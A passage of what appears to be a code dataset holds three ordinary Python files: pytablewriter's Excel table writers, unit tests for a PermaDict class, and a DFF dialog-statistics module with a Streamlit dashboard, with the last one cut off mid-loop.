if self.is_opened() and self.workbook.file_path == file_path: # type: ignore
self._logger.logger.debug("workbook already opened: {}".format(self.workbook.file_path)) # type: ignore
return
self.close()
self._open(file_path)
@abc.abstractmethod
def _open(self, workbook_path: str) -> None: # pragma: no cover
pass
def close(self) -> None:
"""
Close the current workbook.
"""
if self.is_opened():
self.workbook.close() # type: ignore
self._workbook = None
def from_tabledata(self, value: TableData, is_overwrite_table_name: bool = True) -> None:
"""
Set following attributes from |TableData|
- :py:attr:`~.table_name`.
- :py:attr:`~.headers`.
- :py:attr:`~.value_matrix`.
And create worksheet named from :py:attr:`~.table_name` ABC
if not existed yet.
:param tabledata.TableData value: Input table data.
"""
super().from_tabledata(value)
if self.is_opened():
self.make_worksheet(self.table_name)
def make_worksheet(self, sheet_name: Optional[str] = None) -> None:
"""Make a worksheet to the current workbook.
Args:
sheet_name (str):
Name of the worksheet to create. The name will be automatically generated
(like ``"Sheet1"``) if the ``sheet_name`` is empty.
"""
if sheet_name is None:
sheet_name = self.table_name
if not sheet_name:
sheet_name = ""
self._stream = self.workbook.add_worksheet(sheet_name) # type: ignore
self._current_data_row = self._first_data_row
def dump(self, output: str, close_after_write: bool = True, **kwargs) -> None:
"""Write a worksheet to the current workbook.
Args:
output (str):
Path to the workbook file to write.
close_after_write (bool, optional):
Close the workbook after write.
Defaults to |True|.
"""
self.open(output)
try:
self.make_worksheet(self.table_name)
self.write_table(**kwargs)
finally:
if close_after_write:
self.close()
@abc.abstractmethod
def _write_header(self) -> None:
pass
@abc.abstractmethod
def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
pass
def _write_table(self, **kwargs) -> None:
self._preprocess_table_dp()
self._preprocess_table_property()
self._write_header()
self._write_value_matrix()
self._postprocess()
def _write_value_matrix(self) -> None:
for value_dp_list in self._table_value_dp_matrix:
for col_idx, value_dp in enumerate(value_dp_list):
self._write_cell(self._current_data_row, col_idx, value_dp)
self._current_data_row += 1
def _get_last_column(self) -> int:
if typepy.is_not_empty_sequence(self.headers):
return len(self.headers) - 1
if typepy.is_not_empty_sequence(self.value_matrix):
return len(self.value_matrix[0]) - 1
raise ValueError("data not found")
def _postprocess(self) -> None:
self._last_data_row = self._current_data_row
self._last_data_col = self._get_last_column()
class ExcelXlsTableWriter(ExcelTableWriter):
"""
A table writer class for Excel file format: ``.xls`` (older or equal to Office 2003).
``xlwt`` package required to use this class.
.. py:method:: write_table()
Write a table to the current opened worksheet.
:raises IOError: If failed to write data to the worksheet.
.. note::
Specific values in the tabular data are converted when writing:
- |None|: written as an empty string
- |inf|: written as ``Inf``
- |nan|: written as ``NaN``
"""
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self.__col_style_table = {} # type: Dict[int, Any]
def _open(self, workbook_path: str) -> None:
self._workbook = ExcelWorkbookXls(workbook_path)
def _write_header(self) -> None:
if not self.is_write_header or typepy.is_empty_sequence(self.headers):
return
for col, value in enumerate(self.headers):
self.stream.write(self.first_header_row, col, value)
def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
if value_dp.typecode in [typepy.Typecode.REAL_NUMBER]:
try:
cell_style = self.__get_cell_style(col)
except ValueError:
pass
else:
self.stream.write(row, col, value_dp.data, cell_style)
return
self.stream.write(row, col, value_dp.data)
def _postprocess(self) -> None:
super()._postprocess()
self.__col_style_table = {}
def __get_cell_style(self, col: int):
try:
import xlwt
except ImportError:
warnings.warn(import_error_msg_template.format("excel"))
raise
if col in self.__col_style_table:
return self.__col_style_table.get(col)
try:
col_dp = self._column_dp_list[col]
except KeyError:
return {}
if col_dp.typecode not in [typepy.Typecode.REAL_NUMBER]:
raise ValueError()
if not Integer(col_dp.minmax_decimal_places.max_value).is_type():
raise ValueError()
float_digit = col_dp.minmax_decimal_places.max_value
if float_digit <= 0:
raise ValueError()
num_format_str = "#,{:s}0.{:s}".format("#" * int(float_digit), "0" * int(float_digit))
cell_style = xlwt.easyxf(num_format_str=num_format_str)
self.__col_style_table[col] = cell_style
return cell_style
class ExcelXlsxTableWriter(ExcelTableWriter):
"""
A table writer class for Excel file format: ``.xlsx`` (newer or equal to Office 2007).
.. py:method:: write_table()
Write a table to the current opened worksheet.
:raises IOError: If failed to write data to the worksheet.
:Examples:
:ref:`example-excel-table-writer`
.. note::
Specific values in the tabular data are converted when writing:
- |None|: written as an empty string
- |inf|: written as ``Inf``
- |nan|: written as ``NaN``
"""
MAX_CELL_WIDTH = 60
class TableFormat:
HEADER = "header"
CELL = "cell"
NAN = "nan"
class Default:
FONT_NAME = "<NAME>"
FONT_SIZE = 9
CELL_FORMAT = {
"font_name": FONT_NAME,
"font_size": FONT_SIZE,
"align": "top",
"text_wrap": True,
"top": 1,
"left": 1,
"bottom": 1,
"right": 1,
}
HEADER_FORMAT = {
"font_name": FONT_NAME,
"font_size": FONT_SIZE,
"bg_color": "#DFDFFF",
"bold": True,
"left": 1,
"right": 1,
}
NAN_FORMAT = {
"font_name": FONT_NAME,
"font_size": FONT_SIZE,
"font_color": "silver",
"top": 1,
"left": 1,
"bottom": 1,
"right": 1,
}
@property
def __nan_format_property(self) -> Dict:
return self.format_table.get(self.TableFormat.NAN, self.default_format)
@property
def __cell_format_property(self) -> Dict:
return self.format_table.get(self.TableFormat.CELL, self.default_format)
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self.default_format = self.Default.CELL_FORMAT
self.format_table = {
self.TableFormat.CELL: self.Default.CELL_FORMAT,
self.TableFormat.HEADER: self.Default.HEADER_FORMAT,
self.TableFormat.NAN: self.Default.NAN_FORMAT,
}
self.__col_cell_format_cache = {} # type: Dict[int, Any]
self.__col_numprops_table = {} # type: Dict[int, Dict]
def _open(self, workbook_path: str) -> None:
self._workbook = ExcelWorkbookXlsx(workbook_path)
def _write_header(self) -> None:
if not self.is_write_header or typepy.is_empty_sequence(self.headers):
return
header_format_props = self.format_table.get(self.TableFormat.HEADER, self.default_format)
header_format = self.__add_format(header_format_props)
self.stream.write_row(
row=self.first_header_row, col=0, data=self.headers, cell_format=header_format
)
for row in range(self.first_header_row, self.last_header_row):
self.stream.write_row(
row=row, col=0, data=[""] * len(self.headers), cell_format=header_format
)
def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
base_props = dict(self.__cell_format_property)
format_key = "{:d}_{:s}".format(col, value_dp.typecode.name)
if value_dp.typecode in [typepy.Typecode.INTEGER, typepy.Typecode.REAL_NUMBER]:
num_props = self.__get_number_property(col)
base_props.update(num_props)
cell_format = self.__get_cell_format(format_key, base_props)
try:
self.stream.write_number(row, col, float(value_dp.data), cell_format)
return
except TypeError:
pass
if value_dp.typecode is typepy.Typecode.NAN:
base_props = dict(self.__nan_format_property)
cell_format = self.__get_cell_format(format_key, base_props)
self.stream.write(row, col, value_dp.data, cell_format)
def __get_number_property(self, col: int) -> Dict:
if col in self.__col_numprops_table:
return cast(Dict, self.__col_numprops_table.get(col))
try:
col_dp = self._column_dp_list[col]
except KeyError:
return {}
if col_dp.typecode not in [typepy.Typecode.INTEGER, typepy.Typecode.REAL_NUMBER]:
return {}
num_props = {}
if Integer(col_dp.minmax_decimal_places.max_value).is_type():
float_digit = col_dp.minmax_decimal_places.max_value
if float_digit > 0:
num_props = {"num_format": "0.{:s}".format("0" * int(float_digit))}
self.__col_numprops_table[col] = num_props
return num_props
def __get_cell_format(self, format_key, cell_props) -> Dict:
cell_format = self.__col_cell_format_cache.get(format_key)
if cell_format is not None:
return cell_format
# cache miss
cell_format = self.__add_format(cell_props)
self.__col_cell_format_cache[format_key] = cell_format
return cell_format
def __add_format(self, dict_property):
return self.workbook.workbook.add_format(dict_property)
def __set_cell_width(self):
font_size = self.__cell_format_property.get("font_size")
if not Integer(font_size).is_type():
return
for col_idx, col_dp in enumerate(self._column_dp_list):
width = min(col_dp.ascii_char_width, self.MAX_CELL_WIDTH) * (font_size / 10.0) + 2
self.stream.set_column(col_idx, col_idx, width=width)
def _preprocess_table_property(self) -> None:
super()._preprocess_table_property()
self.__set_cell_width()
def _postprocess(self) -> None:
super()._postprocess()
self.stream.autofilter(
self.last_header_row, self.first_data_col, self.last_data_row, self.last_data_col
)
self.stream.freeze_panes(self.first_data_row, self.first_data_col)
self.__col_cell_format_cache = {}
self.__col_numprops_table = {} | pytablewriter/writer/binary/_excel.py | import abc
import copy
import warnings
from typing import Any, Dict, Optional, cast # noqa
import dataproperty
import typepy
from dataproperty import DataProperty
from tabledata import TableData
from typepy import Integer
from .._common import import_error_msg_template
from ._excel_workbook import ExcelWorkbookInterface, ExcelWorkbookXls, ExcelWorkbookXlsx
from ._interface import AbstractBinaryTableWriter
class ExcelTableWriter(AbstractBinaryTableWriter, metaclass=abc.ABCMeta):
"""
An abstract class of a table writer for Excel file format.
"""
FORMAT_NAME = "excel"
@property
def format_name(self) -> str:
return self.FORMAT_NAME
@property
def workbook(self) -> Optional[ExcelWorkbookInterface]:
return self._workbook
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self._workbook = None # type: Optional[ExcelWorkbookInterface]
self._dp_extractor.type_value_map = {
typepy.Typecode.INFINITY: "Inf",
typepy.Typecode.NAN: "NaN",
}
self._first_header_row = 0
self._last_header_row = self.first_header_row
self._first_data_row = self.last_header_row + 1
self._first_data_col = 0
self._last_data_row = None # type: Optional[int]
self._last_data_col = None # type: Optional[int]
self._current_data_row = self._first_data_row
self._quoting_flags = copy.deepcopy(dataproperty.NOT_QUOTING_FLAGS)
self._quoting_flags[typepy.Typecode.DATETIME] = True
@property
def first_header_row(self) -> int:
"""
:return: Index of the first row of the header.
:rtype: int
.. note:: |excel_attr|
"""
return self._first_header_row
@property
def last_header_row(self) -> int:
"""
:return: Index of the last row of the header.
:rtype: int
.. note:: |excel_attr|
"""
return self._last_header_row
@property
def first_data_row(self) -> int:
"""
:return: Index of the first row of the data (table body).
:rtype: int
.. note:: |excel_attr|
"""
return self._first_data_row
@property
def last_data_row(self) -> Optional[int]:
"""
:return: Index of the last row of the data (table body).
:rtype: int
.. note:: |excel_attr|
"""
return self._last_data_row
@property
def first_data_col(self) -> int:
"""
:return: Index of the first column of the table.
:rtype: int
.. note:: |excel_attr|
"""
return self._first_data_col
@property
def last_data_col(self) -> Optional[int]:
"""
:return: Index of the last column of the table.
:rtype: int
.. note:: |excel_attr|
"""
return self._last_data_col
def is_opened(self) -> bool:
return self.workbook is not None
def open(self, file_path: str) -> None:
"""
Open an Excel workbook file.
:param str file_path: Excel workbook file path to open.
"""
if self.is_opened() and self.workbook.file_path == file_path: # type: ignore
self._logger.logger.debug("workbook already opened: {}".format(self.workbook.file_path)) # type: ignore
return
self.close()
self._open(file_path)
@abc.abstractmethod
def _open(self, workbook_path: str) -> None: # pragma: no cover
pass
def close(self) -> None:
"""
Close the current workbook.
"""
if self.is_opened():
self.workbook.close() # type: ignore
self._workbook = None
def from_tabledata(self, value: TableData, is_overwrite_table_name: bool = True) -> None:
"""
Set following attributes from |TableData|
- :py:attr:`~.table_name`.
- :py:attr:`~.headers`.
- :py:attr:`~.value_matrix`.
And create worksheet named from :py:attr:`~.table_name` ABC
if not existed yet.
:param tabledata.TableData value: Input table data.
"""
super().from_tabledata(value)
if self.is_opened():
self.make_worksheet(self.table_name)
def make_worksheet(self, sheet_name: Optional[str] = None) -> None:
"""Make a worksheet to the current workbook.
Args:
sheet_name (str):
Name of the worksheet to create. The name will be automatically generated
(like ``"Sheet1"``) if the ``sheet_name`` is empty.
"""
if sheet_name is None:
sheet_name = self.table_name
if not sheet_name:
sheet_name = ""
self._stream = self.workbook.add_worksheet(sheet_name) # type: ignore
self._current_data_row = self._first_data_row
def dump(self, output: str, close_after_write: bool = True, **kwargs) -> None:
"""Write a worksheet to the current workbook.
Args:
output (str):
Path to the workbook file to write.
close_after_write (bool, optional):
Close the workbook after write.
Defaults to |True|.
"""
self.open(output)
try:
self.make_worksheet(self.table_name)
self.write_table(**kwargs)
finally:
if close_after_write:
self.close()
@abc.abstractmethod
def _write_header(self) -> None:
pass
@abc.abstractmethod
def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
pass
def _write_table(self, **kwargs) -> None:
self._preprocess_table_dp()
self._preprocess_table_property()
self._write_header()
self._write_value_matrix()
self._postprocess()
def _write_value_matrix(self) -> None:
for value_dp_list in self._table_value_dp_matrix:
for col_idx, value_dp in enumerate(value_dp_list):
self._write_cell(self._current_data_row, col_idx, value_dp)
self._current_data_row += 1
def _get_last_column(self) -> int:
if typepy.is_not_empty_sequence(self.headers):
return len(self.headers) - 1
if typepy.is_not_empty_sequence(self.value_matrix):
return len(self.value_matrix[0]) - 1
raise ValueError("data not found")
def _postprocess(self) -> None:
self._last_data_row = self._current_data_row
self._last_data_col = self._get_last_column()
class ExcelXlsTableWriter(ExcelTableWriter):
"""
A table writer class for Excel file format: ``.xls`` (older or equal to Office 2003).
``xlwt`` package required to use this class.
.. py:method:: write_table()
Write a table to the current opened worksheet.
:raises IOError: If failed to write data to the worksheet.
.. note::
Specific values in the tabular data are converted when writing:
- |None|: written as an empty string
- |inf|: written as ``Inf``
- |nan|: written as ``NaN``
"""
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self.__col_style_table = {} # type: Dict[int, Any]
def _open(self, workbook_path: str) -> None:
self._workbook = ExcelWorkbookXls(workbook_path)
def _write_header(self) -> None:
if not self.is_write_header or typepy.is_empty_sequence(self.headers):
return
for col, value in enumerate(self.headers):
self.stream.write(self.first_header_row, col, value)
def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
if value_dp.typecode in [typepy.Typecode.REAL_NUMBER]:
try:
cell_style = self.__get_cell_style(col)
except ValueError:
pass
else:
self.stream.write(row, col, value_dp.data, cell_style)
return
self.stream.write(row, col, value_dp.data)
def _postprocess(self) -> None:
super()._postprocess()
self.__col_style_table = {}
def __get_cell_style(self, col: int):
try:
import xlwt
except ImportError:
warnings.warn(import_error_msg_template.format("excel"))
raise
if col in self.__col_style_table:
return self.__col_style_table.get(col)
try:
col_dp = self._column_dp_list[col]
except KeyError:
return {}
if col_dp.typecode not in [typepy.Typecode.REAL_NUMBER]:
raise ValueError()
if not Integer(col_dp.minmax_decimal_places.max_value).is_type():
raise ValueError()
float_digit = col_dp.minmax_decimal_places.max_value
if float_digit <= 0:
raise ValueError()
num_format_str = "#,{:s}0.{:s}".format("#" * int(float_digit), "0" * int(float_digit))
cell_style = xlwt.easyxf(num_format_str=num_format_str)
self.__col_style_table[col] = cell_style
return cell_style
class ExcelXlsxTableWriter(ExcelTableWriter):
"""
A table writer class for Excel file format: ``.xlsx`` (newer or equal to Office 2007).
.. py:method:: write_table()
Write a table to the current opened worksheet.
:raises IOError: If failed to write data to the worksheet.
:Examples:
:ref:`example-excel-table-writer`
.. note::
Specific values in the tabular data are converted when writing:
- |None|: written as an empty string
- |inf|: written as ``Inf``
- |nan|: written as ``NaN``
"""
MAX_CELL_WIDTH = 60
class TableFormat:
HEADER = "header"
CELL = "cell"
NAN = "nan"
class Default:
FONT_NAME = "<NAME>"
FONT_SIZE = 9
CELL_FORMAT = {
"font_name": FONT_NAME,
"font_size": FONT_SIZE,
"align": "top",
"text_wrap": True,
"top": 1,
"left": 1,
"bottom": 1,
"right": 1,
}
HEADER_FORMAT = {
"font_name": FONT_NAME,
"font_size": FONT_SIZE,
"bg_color": "#DFDFFF",
"bold": True,
"left": 1,
"right": 1,
}
NAN_FORMAT = {
"font_name": FONT_NAME,
"font_size": FONT_SIZE,
"font_color": "silver",
"top": 1,
"left": 1,
"bottom": 1,
"right": 1,
}
@property
def __nan_format_property(self) -> Dict:
return self.format_table.get(self.TableFormat.NAN, self.default_format)
@property
def __cell_format_property(self) -> Dict:
return self.format_table.get(self.TableFormat.CELL, self.default_format)
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self.default_format = self.Default.CELL_FORMAT
self.format_table = {
self.TableFormat.CELL: self.Default.CELL_FORMAT,
self.TableFormat.HEADER: self.Default.HEADER_FORMAT,
self.TableFormat.NAN: self.Default.NAN_FORMAT,
}
self.__col_cell_format_cache = {} # type: Dict[int, Any]
self.__col_numprops_table = {} # type: Dict[int, Dict]
def _open(self, workbook_path: str) -> None:
self._workbook = ExcelWorkbookXlsx(workbook_path)
def _write_header(self) -> None:
if not self.is_write_header or typepy.is_empty_sequence(self.headers):
return
header_format_props = self.format_table.get(self.TableFormat.HEADER, self.default_format)
header_format = self.__add_format(header_format_props)
self.stream.write_row(
row=self.first_header_row, col=0, data=self.headers, cell_format=header_format
)
for row in range(self.first_header_row, self.last_header_row):
self.stream.write_row(
row=row, col=0, data=[""] * len(self.headers), cell_format=header_format
)
def _write_cell(self, row: int, col: int, value_dp: DataProperty) -> None:
base_props = dict(self.__cell_format_property)
format_key = "{:d}_{:s}".format(col, value_dp.typecode.name)
if value_dp.typecode in [typepy.Typecode.INTEGER, typepy.Typecode.REAL_NUMBER]:
num_props = self.__get_number_property(col)
base_props.update(num_props)
cell_format = self.__get_cell_format(format_key, base_props)
try:
self.stream.write_number(row, col, float(value_dp.data), cell_format)
return
except TypeError:
pass
if value_dp.typecode is typepy.Typecode.NAN:
base_props = dict(self.__nan_format_property)
cell_format = self.__get_cell_format(format_key, base_props)
self.stream.write(row, col, value_dp.data, cell_format)
def __get_number_property(self, col: int) -> Dict:
if col in self.__col_numprops_table:
return cast(Dict, self.__col_numprops_table.get(col))
try:
col_dp = self._column_dp_list[col]
except KeyError:
return {}
if col_dp.typecode not in [typepy.Typecode.INTEGER, typepy.Typecode.REAL_NUMBER]:
return {}
num_props = {}
if Integer(col_dp.minmax_decimal_places.max_value).is_type():
float_digit = col_dp.minmax_decimal_places.max_value
if float_digit > 0:
num_props = {"num_format": "0.{:s}".format("0" * int(float_digit))}
self.__col_numprops_table[col] = num_props
return num_props
def __get_cell_format(self, format_key, cell_props) -> Dict:
cell_format = self.__col_cell_format_cache.get(format_key)
if cell_format is not None:
return cell_format
# cache miss
cell_format = self.__add_format(cell_props)
self.__col_cell_format_cache[format_key] = cell_format
return cell_format
def __add_format(self, dict_property):
return self.workbook.workbook.add_format(dict_property)
def __set_cell_width(self):
font_size = self.__cell_format_property.get("font_size")
if not Integer(font_size).is_type():
return
for col_idx, col_dp in enumerate(self._column_dp_list):
width = min(col_dp.ascii_char_width, self.MAX_CELL_WIDTH) * (font_size / 10.0) + 2
self.stream.set_column(col_idx, col_idx, width=width)
def _preprocess_table_property(self) -> None:
super()._preprocess_table_property()
self.__set_cell_width()
def _postprocess(self) -> None:
super()._postprocess()
self.stream.autofilter(
self.last_header_row, self.first_data_col, self.last_data_row, self.last_data_col
)
self.stream.freeze_panes(self.first_data_row, self.first_data_col)
self.__col_cell_format_cache = {}
self.__col_numprops_table = {} | 0.82755 | 0.286862 |
import unittest
from permadict import PermaDict
class PermaDictTests(unittest.TestCase):
"""Tests for PermaDict."""
def test_can_add_key(self):
d = PermaDict()
with self.assertRaises(KeyError):
d[4]
d[4] = "the number four"
self.assertEqual(d[4], "the number four")
def test_equal_to_dict(self):
d = PermaDict()
self.assertNotEqual(d, {4: "the number four"})
d[4] = "the number four"
self.assertEqual(d, {4: "the number four"})
self.assertNotEqual(d, {4: "the number five"})
self.assertEqual(PermaDict({1: 2, 3: 4}), {1: 2, 3: 4})
def test_can_iterate(self):
d = PermaDict({'a': 'b', 'c': 'd'})
self.assertEqual(set(d), {'a', 'c'})
def test_has_keys_values_and_items(self):
d = PermaDict({'a': 'b', 'c': 'd'})
self.assertEqual(set(d.keys()), {'a', 'c'})
self.assertEqual(set(d.values()), {'b', 'd'})
self.assertEqual(set(d.items()), {('a', 'b'), ('c', 'd')})
def test_can_pop_key(self):
d = PermaDict()
d[4] = "the number four"
self.assertEqual(d, {4: "the number four"})
self.assertEqual(d.pop(4), "the number four")
self.assertEqual(d, {})
def test_can_update_with_new_keys(self):
d = PermaDict()
d.update({'a': 1})
self.assertEqual(d, {'a': 1})
d.update([('b', 2)])
self.assertEqual(d, {'a': 1, 'b': 2})
d.update(c=3)
self.assertEqual(d, {'a': 1, 'b': 2, 'c': 3})
def test_error_when_changing_value(self):
d = PermaDict()
d[4] = "the number four"
with self.assertRaises(KeyError):
d[4] = "the number 4"
self.assertEqual(d, {4: "the number four"})
def test_error_when_updating_value(self):
d = PermaDict({1: 2, 3: 4})
with self.assertRaises(KeyError):
d.update([(5, 6), (1, 8), (7, 8)])
self.assertEqual(d, {1: 2, 3: 4, 5: 6})
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_force_set_method(self):
d = PermaDict({1: 2, 3: 4})
d.force_set(3, 6)
d.force_set(5, 6)
self.assertEqual(d, {1: 2, 3: 6, 5: 6})
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_silent_flag_to_initializer(self):
d = PermaDict({1: 2, 3: 4}, silent=True)
d.update([(5, 6), (1, 8), (7, 8)])
self.assertEqual(d, {1: 2, 3: 4, 5: 6, 7: 8})
d[3] = 6
d[9] = 10
self.assertEqual(d, {1: 2, 3: 4, 5: 6, 7: 8, 9: 10})
e = PermaDict(silent=True, not_silent=False, super_silent=True)
self.assertEqual(e, {'not_silent': False, 'super_silent': True})
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_force_argument_to_update(self):
d = PermaDict({1: 2, 3: 4}, silent=True)
d.update([(5, 6), (1, 8), (7, 8)], force=True)
self.assertEqual(d, {1: 8, 3: 4, 5: 6, 7: 8})
e = PermaDict()
e.update(a=1, b=2, force=True)
self.assertEqual(e, {'a': 1, 'b': 2})
if __name__ == "__main__":
unittest.main(verbosity=2) | 20-29/23. permadict/test_permadict.py | import unittest
from permadict import PermaDict
class PermaDictTests(unittest.TestCase):
"""Tests for PermaDict."""
def test_can_add_key(self):
d = PermaDict()
with self.assertRaises(KeyError):
d[4]
d[4] = "the number four"
self.assertEqual(d[4], "the number four")
def test_equal_to_dict(self):
d = PermaDict()
self.assertNotEqual(d, {4: "the number four"})
d[4] = "the number four"
self.assertEqual(d, {4: "the number four"})
self.assertNotEqual(d, {4: "the number five"})
self.assertEqual(PermaDict({1: 2, 3: 4}), {1: 2, 3: 4})
def test_can_iterate(self):
d = PermaDict({'a': 'b', 'c': 'd'})
self.assertEqual(set(d), {'a', 'c'})
def test_has_keys_values_and_items(self):
d = PermaDict({'a': 'b', 'c': 'd'})
self.assertEqual(set(d.keys()), {'a', 'c'})
self.assertEqual(set(d.values()), {'b', 'd'})
self.assertEqual(set(d.items()), {('a', 'b'), ('c', 'd')})
def test_can_pop_key(self):
d = PermaDict()
d[4] = "the number four"
self.assertEqual(d, {4: "the number four"})
self.assertEqual(d.pop(4), "the number four")
self.assertEqual(d, {})
def test_can_update_with_new_keys(self):
d = PermaDict()
d.update({'a': 1})
self.assertEqual(d, {'a': 1})
d.update([('b', 2)])
self.assertEqual(d, {'a': 1, 'b': 2})
d.update(c=3)
self.assertEqual(d, {'a': 1, 'b': 2, 'c': 3})
def test_error_when_changing_value(self):
d = PermaDict()
d[4] = "the number four"
with self.assertRaises(KeyError):
d[4] = "the number 4"
self.assertEqual(d, {4: "the number four"})
def test_error_when_updating_value(self):
d = PermaDict({1: 2, 3: 4})
with self.assertRaises(KeyError):
d.update([(5, 6), (1, 8), (7, 8)])
self.assertEqual(d, {1: 2, 3: 4, 5: 6})
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_force_set_method(self):
d = PermaDict({1: 2, 3: 4})
d.force_set(3, 6)
d.force_set(5, 6)
self.assertEqual(d, {1: 2, 3: 6, 5: 6})
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_silent_flag_to_initializer(self):
d = PermaDict({1: 2, 3: 4}, silent=True)
d.update([(5, 6), (1, 8), (7, 8)])
self.assertEqual(d, {1: 2, 3: 4, 5: 6, 7: 8})
d[3] = 6
d[9] = 10
self.assertEqual(d, {1: 2, 3: 4, 5: 6, 7: 8, 9: 10})
e = PermaDict(silent=True, not_silent=False, super_silent=True)
self.assertEqual(e, {'not_silent': False, 'super_silent': True})
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_force_argument_to_update(self):
d = PermaDict({1: 2, 3: 4}, silent=True)
d.update([(5, 6), (1, 8), (7, 8)], force=True)
self.assertEqual(d, {1: 8, 3: 4, 5: 6, 7: 8})
e = PermaDict()
e.update(a=1, b=2, force=True)
self.assertEqual(e, {'a': 1, 'b': 2})
if __name__ == "__main__":
unittest.main(verbosity=2) | 0.678007 | 0.745908 |
from typing import Optional
import pathlib
import datetime
import pandas as pd
from pydantic import validate_arguments, BaseModel
from dff.core import Context, Actor
from dff.core.types import ActorStage
class Stats(BaseModel):
csv_file: pathlib.Path
start_time: Optional[datetime.datetime] = None
dfs: list = []
column_dtypes: dict = {
"context_id": "str",
"flow_label": "str",
"node_label": "str",
"history_id": "int64",
"duration_time": "float64",
}
@validate_arguments
def _update_handlers(self, actor: Actor, stage: ActorStage, handler) -> Actor:
actor.handlers[stage] = actor.handlers.get(stage, []) + [handler]
return actor
def update_actor_handlers(self, actor: Actor, auto_save: bool = True, *args, **kwargs):
self._update_handlers(actor, ActorStage.CONTEXT_INIT, self.get_start_time)
self._update_handlers(actor, ActorStage.FINISH_TURN, self.collect_stats)
if auto_save:
self._update_handlers(actor, ActorStage.FINISH_TURN, self.save)
@validate_arguments
def get_start_time(self, ctx: Context, actor: Actor, *args, **kwargs):
self.start_time = datetime.datetime.now()
if ctx.last_label is None:
self.add_df(ctx.id, -1, *actor.start_label[:2])
def add_df(self, context_id, history_id, flow_label, node_label):
self.dfs += [
pd.DataFrame(
{
"context_id": [str(context_id)],
"history_id": [history_id],
"start_time": [self.start_time],
"duration_time": [(datetime.datetime.now() - self.start_time).total_seconds()],
"flow_label": [flow_label],
"node_label": [node_label],
},
)
]
@validate_arguments
def collect_stats(self, ctx: Context, actor: Actor, *args, **kwargs):
indexes = list(ctx.labels)
current_index = indexes[-1] if indexes else -1
self.add_df(
ctx.id,
current_index,
*ctx.last_label[:2],
)
def save(self, *args, **kwargs):
saved_df = (
pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
if self.csv_file.exists()
else pd.DataFrame()
)
pd.concat([saved_df] + self.dfs).to_csv(self.csv_file, index=False)
self.dfs.clear()
@property
def dataframe(self):
return pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
@property
def transition_counts(self):
df = self.dataframe.copy()
df["node"] = df.apply(lambda row: f"{row.flow_label}:{row.node_label}", axis=1)
df = df.drop(["flow_label", "node_label"], axis=1)
df = df.sort_values(["context_id"], kind="stable")
df["next_node"] = df.node.shift()
df = df[df.history_id != 0]
transitions = df.apply(lambda row: f"{row.node}->{row.next_node}", axis=1)
return {k: int(v) for k, v in dict(transitions.value_counts()).items()}
@property
def transition_probs(self):
tc = self.transition_counts
total = sum(tc.values(), 0)
return {k: v / total for k, v in tc.items()}
def preproc_df(self, df):
for context_id in self.dataframe.context_id.unique():
ctx_index = df.context_id == context_id
df.loc[ctx_index, "node"] = df.loc[ctx_index, "flow_label"] + ":" + df.loc[ctx_index, "node_label"]
df.loc[ctx_index, "edge"] = (
df.loc[ctx_index, "node"].shift(periods=1).combine(df.loc[ctx_index, "node"], lambda *x: list(x))
)
flow_label = df.loc[ctx_index, "flow_label"]
df.loc[ctx_index, "edge_type"] = flow_label.where(flow_label.shift(periods=1) == flow_label, "MIXED")
return df
def streamlit_run(self):
import streamlit as st
import graphviz
import datetime
@st.cache(allow_output_mutation=True)
def read_data():
df = pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
df = self.preproc_df(df)
return df
df_origin = read_data()
@st.cache()
def get_datatimes():
start_time = pd.to_datetime(df_origin.start_time.min()) - datetime.timedelta(days=1)
end_time = pd.to_datetime(df_origin.start_time.max()) + datetime.timedelta(days=1)
return start_time, end_time
start_time_border, end_time_border = get_datatimes()
def get_sidebar_chnges():
start_date = pd.to_datetime(st.sidebar.date_input("Start date", start_time_border))
end_date = pd.to_datetime(st.sidebar.date_input("End date", end_time_border))
if start_date < end_date:
st.sidebar.success("Start date: `%s`\n\nEnd date:`%s`" % (start_date, end_date))
else:
st.sidebar.error("Error: End date must fall after start date.")
context_id = st.sidebar.selectbox(
"Choose context_id",
options=["all"] + df_origin.context_id.unique().tolist(),
)
return start_date, end_date, context_id
start_date, end_date, context_id = get_sidebar_chnges()
@st.cache()
def slice_df_origin(start_date, end_date, context_id):
return df_origin[
(df_origin.start_time >= start_date)
& (df_origin.start_time <= end_date)
& ((df_origin.context_id == context_id) | (context_id == "all"))
]
df = slice_df_origin(start_date, end_date, context_id)
node_counter = df.node.value_counts()
edge_counter = df.edge.value_counts()
node2code = {key: f"n{index}" for index, key in enumerate(df.node.unique())}
st.title("DialogFlow Framework Statistic Dashboard")
col1, col2 = st.columns(2)
col1.subheader("Data")
col1.dataframe(df)
col2.subheader("Timings")
col2.dataframe(df.describe().duration_time)
col2.write(f"Data shape {df.shape}")
st.subheader("Graph of Transitions")
graph = graphviz.Digraph()
graph.attr(compound="true")
flow_labels = df.flow_label.unique()
for i, flow_label in enumerate(flow_labels):
with graph.subgraph(name=f"cluster{i}") as sub_graph:
sub_graph.attr(style="filled", color="lightgrey")
sub_graph.attr(label=flow_label)
sub_graph.node_attr.update(style="filled", color="white")
for _, (history_id, node, node_label) in df.loc[
df.flow_label == flow_label, ("history_id", "node", "node_label")
].iterrows():
counter = node_counter[node]
label = f"{node_label} ({counter=})"
if history_id == -1:
sub_graph.node(node2code[node], label=label, shape="Mdiamond")
else:
sub_graph.node(node2code[node], label=label)
for (in_node, out_node), counter in edge_counter.items():
if isinstance(in_node, str):
